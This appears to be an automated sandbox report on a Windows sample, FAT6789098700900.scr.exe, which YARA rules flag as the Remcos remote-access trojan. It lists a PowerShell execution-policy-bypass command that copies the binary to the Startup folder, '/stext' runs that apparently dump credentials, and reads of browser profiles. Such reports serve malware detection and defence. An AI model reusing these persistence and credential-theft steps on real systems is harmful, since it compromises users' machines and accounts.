                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.4123803181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: .exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: .exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: FAT6789098700900.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: .exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: FAT6789098700900.scr.exe, -U-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: FAT6789098700900.scr.exe, -U-.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.FAT6789098700900.scr.exe.5190000.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FAT6789098700900.scr.exe.5190000.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                  Source: FAT6789098700900.scr.exe, -k.csSuspicious method names: ._FFFDk.GetRuleFromDpapiNGProtectedPayloadCore
                  Source: FAT6789098700900.scr.exe, -k.csSuspicious method names: ._FFFDk.GetRuleFromDpapiNGProtectedPayload
                  Source: FAT6789098700900.scr.exe, -z-t.csSuspicious method names: ._00ABz_07B4t.CryptCommon_PayloadInvalid
                  Source: classification engineClassification label: mal100.rans.spre.phis.troj.adwa.spyw.expl.evad.winEXE@24/21@1/3
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_00416AB7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040E219
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041A63F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,11_2_00419BC4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rql0id1w.bt4.ps1Jump to behavior
                  Source: FAT6789098700900.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: FAT6789098700900.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSystem information queried: HandleInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: .exe, .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: .exe, .exe, 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: .exe, .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: .exe, .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: .exe, .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: .exe, 0000000D.00000002.1862743413.0000000003184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: .exe, .exe, 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: FAT6789098700900.scr.exeReversingLabs: Detection: 52%
                  Source: FAT6789098700900.scr.exeVirustotal: Detection: 33%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_16-32934
                  Source: unknownProcess created: C:\Users\user\Desktop\FAT6789098700900.scr.exe "C:\Users\user\Desktop\FAT6789098700900.scr.exe"
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Users\user\Desktop\FAT6789098700900.scr.exe "C:\Users\user\Desktop\FAT6789098700900.scr.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 512
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\yvbpfnx"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\lrtshyspzluife"
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Users\user\Desktop\FAT6789098700900.scr.exe "C:\Users\user\Desktop\FAT6789098700900.scr.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\yvbpfnx"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\lrtshyspzluife"Jump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
